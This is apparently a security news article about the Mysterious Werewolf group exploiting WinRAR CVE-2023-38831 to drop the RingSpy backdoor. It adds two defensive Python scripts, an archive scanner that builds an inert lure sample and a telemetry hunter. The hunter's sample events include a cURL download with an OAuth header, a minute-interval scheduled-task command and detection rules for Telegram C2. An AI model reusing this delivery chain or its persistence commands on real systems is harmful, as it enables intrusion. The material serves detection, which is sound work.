Werewolf Hackers Exploiting WinRAR Vulnerability To Deploy RingSpy Backdoor

Active since 2023, the Mysterious Werewolf cluster has shifted its targeting to the military-industrial complex (MIC), delivering a weaponized archive through phishing emails.

The archive contains a seemingly legitimate PDF document alongside a malicious CMD file. When the victim opens the archive and double-clicks the PDF, WinRAR executes the CMD file rather than the document; the script then downloads and opens a decoy PDF for the victim while starting the chain that deploys the RingSpy backdoor on the compromised system.

RingSpy replaces the Athena agent of the Mythic framework, which Mysterious Werewolf used in its earlier campaigns.

The group's phishing emails carry malicious archives that exploit CVE-2023-38831, a WinRAR vulnerability fixed in version 6.23, to execute code when the victim opens what looks like a document.
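The archive layout that makes this work can be checked before a user ever opens the file. The scanner below is an added example, not code from the article or from Bi.zone. It relies on a fact about CVE-2023-38831 that the article does not spell out: WinRAR before 6.23, when the user double-clicks a file entry such as "Contract.pdf " (with a trailing space), also processes the same-named folder "Contract.pdf /" and runs the same-named script inside it. The two archives are constructed in memory, and the file names are illustrative; it handles ZIP input only.

```python
"""Flag ZIP archives laid out like a CVE-2023-38831 lure.

Added example; it is not code from the article or from Bi.zone. A decoy
file entry whose name (ignoring trailing spaces) matches a folder that holds
an executable-type entry is the telltale pattern. Archives are constructed
in memory; file names are illustrative.
"""
import io
import posixpath
import zipfile

# Extensions Windows will run when WinRAR hands the extracted entry to the shell.
EXEC_EXTS = {".cmd", ".bat", ".exe", ".vbs", ".vbe", ".js", ".jse", ".wsf",
             ".ps1", ".scr", ".com", ".pif"}


def _norm(name: str) -> str:
    # The lure relies on trailing spaces; compare names with them stripped
    # and case-folded so "Contract.pdf " and "contract.pdf" collide.
    return name.rstrip(" ").lower()


def find_decoy_collisions(zip_bytes: bytes) -> list[tuple[str, str]]:
    """Return (decoy_entry, script_entry) pairs: a file entry whose name
    matches the folder part of another entry with an executable extension."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
    files = {_norm(n): n for n in names if not n.endswith("/")}
    findings = []
    for entry in names:
        if entry.endswith("/") or "/" not in entry:
            continue
        folder, base = entry.rsplit("/", 1)
        decoy = files.get(_norm(folder))
        if decoy is None:
            continue
        if posixpath.splitext(base.rstrip(" "))[1].lower() in EXEC_EXTS:
            findings.append((decoy, entry))
    return findings


def build_lure_sample() -> bytes:
    """Constructed archive with the decoy / same-named folder / script layout."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Contract.pdf ", b"%PDF-1.4\n% decoy, not a real document\n")
        zf.writestr("Contract.pdf /Contract.pdf .cmd",
                    b"@echo off\r\nrem placeholder, no payload\r\n")
    return buf.getvalue()


def build_benign_sample() -> bytes:
    """Constructed archive with an ordinary document and an unrelated folder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Contract.pdf", b"%PDF-1.4\n")
        zf.writestr("notes/readme.txt", b"nothing to see\n")
    return buf.getvalue()


if __name__ == "__main__":
    for label, data in (("lure", build_lure_sample()),
                        ("benign", build_benign_sample())):
        print(label, find_decoy_collisions(data))
```

The check reads only the central directory, so it is cheap enough to run on every archive attachment at the mail gateway; a hit is worth blocking outright, since no legitimate archive needs a file and a folder with the same name and a script inside the folder.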


Tactics have shifted: the Athena agent has been swapped for RingSpy, a backdoor written in Python, and the group now relies on legitimate services to keep control of compromised systems, with a Telegram bot serving as its command-and-control (C2) server.

The malicious archive exploited CVE-2023-38831 in WinRAR to launch a VBScript (.vbs), which retrieved a download link from Yandex Disk and used it to fetch a malicious batch file (1.bat).

Downloading the file using the received link

The batch file 1.bat obtained the download link for a Yandex Disk resource with a cURL request carrying OAuth credentials, downloaded a second batch file (i.bat) from that link, deleted the file holding the link, and executed i.bat through another VBScript call.

Both 1.bat and i.bat delete themselves after running. i.bat first checks for an existing file so that it does not reinstall itself, then retrieves a download link, fetches a decoy PDF, opens it for the victim, and deletes the link.

Distracting document

Next, it downloads a predefined version of the Python installer from the official website, extracts it into a hidden local folder, and writes the configuration file that specifies the search paths for Python modules (the ._pth file read by the embeddable Python package).

It then downloads the pip installer into the Python folder, uses pip to install the additional libraries the backdoor needs (requests and schedule), and cleans up by deleting the temporary installer script.

Downloading the Python interpreter

RingSpy itself is delivered through the Yandex Cloud API as a Python script, downloaded and executed by a VBScript (.vbs) file placed in the Startup folder and in the LocalAppData folder.

The backdoor executes remote commands, downloads files, and returns the results to the operator through the Telegram bot that acts as the control server. The script can also be registered, via PowerShell, as a scheduled task that runs every minute.

Downloaded files are saved to a fixed folder, and the backdoor sends its data with requests to the Telegram Bot API.

Obtaining and running the pip installer

According to Bi.zone, the attacker most likely gained initial access with a spear-phishing email carrying the attachment. Once inside, the group executed malicious code through PowerShell, the command prompt, VBScript, and Python.

Execution relied on the WinRAR vulnerability (CVE-2023-38831). For persistence, the group used scheduled tasks and the Startup folder.

To evade defenses the attacker deleted files after use, and command and control relied on file transfers through legitimate cloud storage and a Telegram bot.
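Each stage of that chain leaves a distinct trace in endpoint telemetry, and the relationships between stages (WinRAR spawning a script host, curl with an OAuth header, a Python interpreter under LocalAppData talking to the Telegram API) are what to hunt for. The script below is an added example, not code from the article or from Bi.zone. The events are constructed in a simplified Sysmon-like shape (Image, ParentImage, CommandLine, DestinationHostname); the user name, folder names, the Yandex Disk API host (cloud-api.yandex.net) and the exact PowerShell cmdlets used for the minute-interval task are assumptions made to keep the sample realistic, since the article only states that a scheduled task, a Startup-folder .vbs, cURL with OAuth credentials, a Python backdoor under LocalAppData and a Telegram bot are involved.

```python
"""Hunt for the RingSpy delivery and persistence chain in endpoint telemetry.

Added example, not code from the article or from Bi.zone. SAMPLE_EVENTS is
constructed telemetry; hostnames, paths and the PowerShell cmdlets in it are
assumptions, not indicators taken from the report.
"""
import re

SAMPLE_EVENTS = [  # constructed, not real logs
    {"id": 1, "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\u\Downloads\Contract.zip'},
    {"id": 2, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\WinRAR\WinRAR.exe",
     "CommandLine": r'cmd /c "C:\Users\u\AppData\Local\Temp\Contract.pdf \Contract.pdf .cmd"'},
    {"id": 3, "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'curl -s -H "Authorization: OAuth y0_redacted" "https://cloud-api.yandex.net/v1/disk/resources/download?path=i.bat"'},
    {"id": 4, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'powershell -c "Register-ScheduledTask -TaskName Updater -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1)) -Action (New-ScheduledTaskAction -Execute wscript.exe -Argument C:\Users\u\AppData\Local\upd\run.vbs)"'},
    {"id": 5, "Image": r"C:\Users\u\AppData\Local\upd\python\python.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"python.exe C:\Users\u\AppData\Local\upd\main.py"},
    {"id": 6, "Image": r"C:\Users\u\AppData\Local\upd\python\python.exe",
     "DestinationHostname": "api.telegram.org", "DestinationPort": 443},
    {"id": 7, "Image": r"C:\Program Files\Python312\python.exe",  # benign developer use
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r"python.exe notebook.py"},
    {"id": 8, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'wscript.exe "C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.vbs"'},
]

SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
# Either the cmdlet form or a schtasks call with a one-minute schedule.
MINUTE_TASK = re.compile(r"register-scheduledtask.*-minutes\s+1\b|schtasks.*/sc\s+minute")


def _field(ev: dict, key: str) -> str:
    return str(ev.get(key, "")).lower()


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def archive_spawned_script(ev):
    # An archiver should open documents, not script interpreters.
    return (_basename(_field(ev, "ParentImage")) == "winrar.exe"
            and _basename(_field(ev, "Image")) in SCRIPT_HOSTS)


def oauth_curl_to_yandex(ev):
    cl = _field(ev, "CommandLine")
    return (_basename(_field(ev, "Image")) == "curl.exe"
            and "authorization: oauth" in cl and "yandex" in cl)


def minute_scheduled_task(ev):
    return (_basename(_field(ev, "Image")) == "powershell.exe"
            and MINUTE_TASK.search(_field(ev, "CommandLine")) is not None)


def startup_vbs(ev):
    cl = _field(ev, "CommandLine")
    return (_basename(_field(ev, "Image")) in {"wscript.exe", "cscript.exe"}
            and "\\startup\\" in cl and ".vbs" in cl)


def python_from_localappdata(ev):
    # A Python interpreter living under a user profile, not a normal install.
    img = _field(ev, "Image")
    return _basename(img) == "python.exe" and "\\appdata\\local\\" in img


def python_to_telegram(ev):
    return (_basename(_field(ev, "Image")) == "python.exe"
            and _field(ev, "DestinationHostname") == "api.telegram.org")


RULES = (archive_spawned_script, oauth_curl_to_yandex, minute_scheduled_task,
         startup_vbs, python_from_localappdata, python_to_telegram)


def hunt(events):
    """Return (event id, rule name) pairs, in event order then rule order."""
    return [(ev["id"], rule.__name__) for ev in events for rule in RULES if rule(ev)]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

On the constructed sample every stage except the initial WinRAR launch produces a hit, and the benign developer Python run (event 7) stays quiet. In production the single strongest signal is the process tree: WinRAR.exe as the parent of cmd.exe or wscript.exe is rare enough to alert on by itself, while the Telegram and LocalAppData rules are best correlated with each other to keep false positives down.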


Tushar Subhra

